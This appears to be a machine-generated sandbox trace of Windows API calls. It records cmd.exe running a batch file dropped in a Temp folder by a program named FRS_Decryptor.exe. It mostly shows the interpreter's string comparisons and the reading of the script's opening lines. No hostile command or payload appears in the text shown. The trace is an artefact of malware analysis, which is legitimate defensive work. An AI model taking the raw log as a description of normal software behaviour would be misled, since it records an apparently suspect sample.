[0068.425] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.425] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.425] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.425] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.425] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.425] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.425] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.425] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.425] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x10ef5a4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0068.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x10ef5a4, lpFilePart=0x10ef5a0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x10ef5a0*="Desktop") returned 0x1c [0068.425] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0068.425] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x10ef320 | out: lpFindFileData=0x10ef320) returned 0x1424398 [0068.425] FindClose (in: hFindFile=0x1424398 | out: hFindFile=0x1424398) returned 1 [0068.425] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x10ef320 | out: lpFindFileData=0x10ef320) returned 0x1424398 [0068.425] FindClose (in: hFindFile=0x1424398 | out: hFindFile=0x1424398) returned 1 [0068.425] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0068.425] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x10ef320 | out: lpFindFileData=0x10ef320) returned 0x1424398 [0068.425] FindClose (in: hFindFile=0x1424398 | out: hFindFile=0x1424398) returned 1 [0068.425] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0068.426] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0068.426] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0068.426] GetEnvironmentStringsW () returned 0x1426250* [0068.426] FreeEnvironmentStringsA (penv="=") returned 1 [0068.426] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0068.430] GetConsoleOutputCP () returned 0x1b5 [0068.430] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.430] GetUserDefaultLCID () returned 0x409 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x10ef6d0, cchData=128 | out: lpLCData="0") returned 2 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x10ef6d0, cchData=128 | out: lpLCData="0") returned 2 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x10ef6d0, cchData=128 | out: lpLCData="1") returned 2 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0068.431] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0068.431] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0068.432] GetConsoleTitleW (in: lpConsoleTitle=0x1424f90, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe") returned 0x41 [0068.432] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0068.432] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0068.432] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0068.432] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0068.433] _wcsicmp (_String1="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\"", _String2=")") returned -7 [0068.433] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\"") returned 68 [0068.433] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\"") returned 68 [0068.433] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\"") returned 71 [0068.433] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\"") returned 71 [0068.433] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\"") returned 80 [0068.433] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\"") returned 80 [0068.435] GetConsoleTitleW (in: lpConsoleTitle=0x10ef3c0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe") returned 0x41 [0068.435] GetFileAttributesW (lpFileName="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat\"" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\\"c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat\"")) returned 0xffffffff [0068.435] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0068.435] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0068.435] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0068.435] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0068.435] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0068.435] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0068.436] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0068.436] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0068.436] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0068.436] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0068.436] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0068.436] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0068.436] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0068.436] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0068.436] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0068.436] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0068.436] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0068.436] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0068.436] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0068.436] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0068.436] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0068.436] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0068.436] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0068.436] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0068.436] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0068.436] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0068.436] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0068.436] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0068.436] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0068.436] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0068.436] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0068.436] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0068.436] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0068.436] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0068.436] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0068.436] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0068.436] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0068.436] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0068.436] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0068.436] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0068.436] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0068.436] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0068.436] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0068.436] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0068.436] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0068.436] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0068.436] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0068.436] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0068.436] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0068.436] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0068.436] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0068.436] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0068.436] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0068.436] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0068.436] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0068.436] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0068.436] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0068.436] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0068.436] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0068.436] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0068.436] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0068.436] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0068.436] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0068.436] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0068.437] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0068.437] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0068.437] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0068.437] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0068.437] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0068.437] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0068.437] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0068.437] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0068.437] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0068.437] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0068.437] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0068.437] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0068.437] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0068.437] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0068.437] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0068.437] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0068.437] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0068.437] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0068.437] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0068.437] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0068.437] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0068.437] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0068.437] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0068.437] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0068.438] SetErrorMode (uMode=0x0) returned 0x0 [0068.438] SetErrorMode (uMode=0x1) returned 0x0 [0068.438] GetFullPathNameW (in: lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x1432290, lpFilePart=0x10eeec4 | out: lpBuffer="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp", lpFilePart=0x10eeec4*="Temp") returned 0x24 [0068.438] SetErrorMode (uMode=0x0) returned 0x1 [0068.438] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\.") returned 1 [0068.438] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.440] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0068.440] FindFirstFileExW (in: lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat", fInfoLevelId=0x1, lpFindFileData=0x10eec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x10eec70) returned 0x14256f0 [0068.441] FindClose (in: hFindFile=0x14256f0 | out: hFindFile=0x14256f0) returned 1 [0068.441] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0068.441] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0068.441] GetConsoleTitleW (in: lpConsoleTitle=0x10ef14c, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe") returned 0x41 [0068.441] ApiSetQueryApiSetPresence () returned 0x0 [0068.441] LdrResolveDelayLoadedAPI () returned 0x748212ed [0068.442] SaferWorker () returned 0x0 [0068.451] SetErrorMode (uMode=0x0) returned 0x0 [0068.451] SetErrorMode (uMode=0x1) returned 0x0 [0068.451] GetFullPathNameW (in: lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat", nBufferLength=0x104, lpBuffer=0x1425320, lpFilePart=0x10eeffc | out: lpBuffer="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat", lpFilePart=0x10eeffc*="CBUG7MRD.bat") returned 0x31 [0068.451] SetErrorMode (uMode=0x0) returned 0x1 [0068.451] wcsspn (_String=" C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe ", _Control=" \x09") returned 0x1 [0068.453] LdrResolveDelayLoadedAPI () returned 0x74821293 [0068.453] CmdBatNotificationStub () returned 0x74821293 [0068.453] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0068.453] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0068.453] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.453] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.453] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.453] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.453] ReadFile (in: hFile=0x84, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1df5, lpOverlapped=0x0) returned 1 [0068.453] SetFilePointer (in: hFile=0x84, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0068.453] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="@shift\r\n") returned 8 [0068.454] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.454] GetFileType (hFile=0x84) returned 0x1 [0068.454] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.454] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0068.454] _wcsicmp (_String1="shift", _String2=")") returned 74 [0068.454] _wcsicmp (_String1="FOR", _String2="shift") returned -13 [0068.454] _wcsicmp (_String1="FOR/?", _String2="shift") returned -13 [0068.454] _wcsicmp (_String1="IF", _String2="shift") returned -10 [0068.454] _wcsicmp (_String1="IF/?", _String2="shift") returned -10 [0068.454] _wcsicmp (_String1="REM", _String2="shift") returned -1 [0068.454] _wcsicmp (_String1="REM/?", _String2="shift") returned -1 [0068.455] _tell (_FileHandle=3) returned 8 [0068.455] _close (_FileHandle=3) returned 0 [0068.455] _wcsicmp (_String1="shift", _String2="DIR") returned 15 [0068.455] _wcsicmp (_String1="shift", _String2="ERASE") returned 14 [0068.455] _wcsicmp (_String1="shift", _String2="DEL") returned 15 [0068.455] _wcsicmp (_String1="shift", _String2="TYPE") returned -1 [0068.455] _wcsicmp (_String1="shift", _String2="COPY") returned 16 [0068.455] _wcsicmp (_String1="shift", _String2="CD") returned 16 [0068.455] _wcsicmp (_String1="shift", _String2="CHDIR") returned 16 [0068.455] _wcsicmp (_String1="shift", _String2="RENAME") returned 1 [0068.455] _wcsicmp (_String1="shift", _String2="REN") returned 1 [0068.455] _wcsicmp (_String1="shift", _String2="ECHO") returned 14 [0068.455] _wcsicmp (_String1="shift", _String2="SET") returned 3 [0068.455] _wcsicmp (_String1="shift", _String2="PAUSE") returned 3 [0068.455] _wcsicmp (_String1="shift", _String2="DATE") returned 15 [0068.455] _wcsicmp (_String1="shift", _String2="TIME") returned -1 [0068.455] _wcsicmp (_String1="shift", _String2="PROMPT") returned 3 [0068.455] _wcsicmp (_String1="shift", _String2="MD") returned 6 [0068.455] _wcsicmp (_String1="shift", _String2="MKDIR") returned 6 [0068.455] _wcsicmp (_String1="shift", _String2="RD") returned 1 [0068.455] _wcsicmp (_String1="shift", _String2="RMDIR") returned 1 [0068.455] _wcsicmp (_String1="shift", _String2="PATH") returned 3 [0068.455] _wcsicmp (_String1="shift", _String2="GOTO") returned 12 [0068.455] _wcsicmp (_String1="shift", _String2="SHIFT") returned 0 [0068.455] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe") returned 0x41 [0068.464] _wcsicmp (_String1="shift", _String2="DIR") returned 15 [0068.464] _wcsicmp (_String1="shift", _String2="ERASE") returned 14 [0068.464] _wcsicmp (_String1="shift", _String2="DEL") returned 15 [0068.464] _wcsicmp (_String1="shift", _String2="TYPE") returned -1 [0068.464] _wcsicmp (_String1="shift", _String2="COPY") returned 16 [0068.464] _wcsicmp (_String1="shift", _String2="CD") returned 16 [0068.464] _wcsicmp (_String1="shift", _String2="CHDIR") returned 16 [0068.464] _wcsicmp (_String1="shift", _String2="RENAME") returned 1 [0068.464] _wcsicmp (_String1="shift", _String2="REN") returned 1 [0068.464] _wcsicmp (_String1="shift", _String2="ECHO") returned 14 [0068.464] _wcsicmp (_String1="shift", _String2="SET") returned 3 [0068.464] _wcsicmp (_String1="shift", _String2="PAUSE") returned 3 [0068.464] _wcsicmp (_String1="shift", _String2="DATE") returned 15 [0068.464] _wcsicmp (_String1="shift", _String2="TIME") returned -1 [0068.464] _wcsicmp (_String1="shift", _String2="PROMPT") returned 3 [0068.464] _wcsicmp (_String1="shift", _String2="MD") returned 6 [0068.464] _wcsicmp (_String1="shift", _String2="MKDIR") returned 6 [0068.464] _wcsicmp (_String1="shift", _String2="RD") returned 1 [0068.464] _wcsicmp (_String1="shift", _String2="RMDIR") returned 1 [0068.464] _wcsicmp (_String1="shift", _String2="PATH") returned 3 [0068.464] _wcsicmp (_String1="shift", _String2="GOTO") returned 12 [0068.464] _wcsicmp (_String1="shift", _String2="SHIFT") returned 0 [0068.464] _get_osfhandle (_FileHandle=1) returned 0xc [0068.464] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.465] _get_osfhandle (_FileHandle=1) returned 0xc [0068.465] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.465] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.465] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.465] SetConsoleInputExeNameW () returned 0x1 [0068.465] GetConsoleOutputCP () returned 0x1b5 [0068.465] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.465] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.465] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0068.465] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0068.466] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.466] SetFilePointer (in: hFile=0x84, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0068.466] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.466] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0068.466] ReadFile (in: hFile=0x84, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1ded, lpOverlapped=0x0) returned 1 [0068.466] SetFilePointer (in: hFile=0x84, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0068.466] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11 [0068.466] GetFileType (hFile=0x84) returned 0x1 [0068.466] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.466] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0068.466] _tell (_FileHandle=3) returned 19 [0068.466] _close (_FileHandle=3) returned 0 [0068.466] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0068.466] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0068.466] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0068.466] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0068.466] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0068.466] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0068.466] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0068.466] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0068.466] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0068.466] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0068.466] GetConsoleTitleW (in: lpConsoleTitle=0x10eec48, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe") returned 0x41 [0068.467] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0068.467] _get_osfhandle (_FileHandle=1) returned 0xc [0068.467] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0068.467] _get_osfhandle (_FileHandle=1) returned 0xc [0068.467] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0068.467] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.467] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.467] SetConsoleInputExeNameW () returned 0x1 [0068.467] GetConsoleOutputCP () returned 0x1b5 [0068.467] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.467] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.468] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CBUG7MRD.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\cbug7mrd.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10ef098, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0068.468] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0068.468] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.468] SetFilePointer (in: hFile=0x84, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0068.468] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.468] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0068.468] ReadFile (in: hFile=0x84, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x10ef05c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0x10ef05c*=0x1de2, lpOverlapped=0x0) returned 1 [0068.468] SetFilePointer (in: hFile=0x84, lDistanceToMove=40, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x28 [0068.468] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="title FRS Decryptor\r\n") returned 21 [0068.468] GetFileType (hFile=0x84) returned 0x1 [0068.468] _get_osfhandle (_FileHandle=3) returned 0x84 [0068.468] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x28 [0068.468] _tell (_FileHandle=3) returned 40 [0068.468] _close (_FileHandle=3) returned 0 [0068.468] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0068.468] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0068.468] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0068.469] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0068.469] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0068.469] _wcsicmp (_String1="title", _String2="CD") returned 17 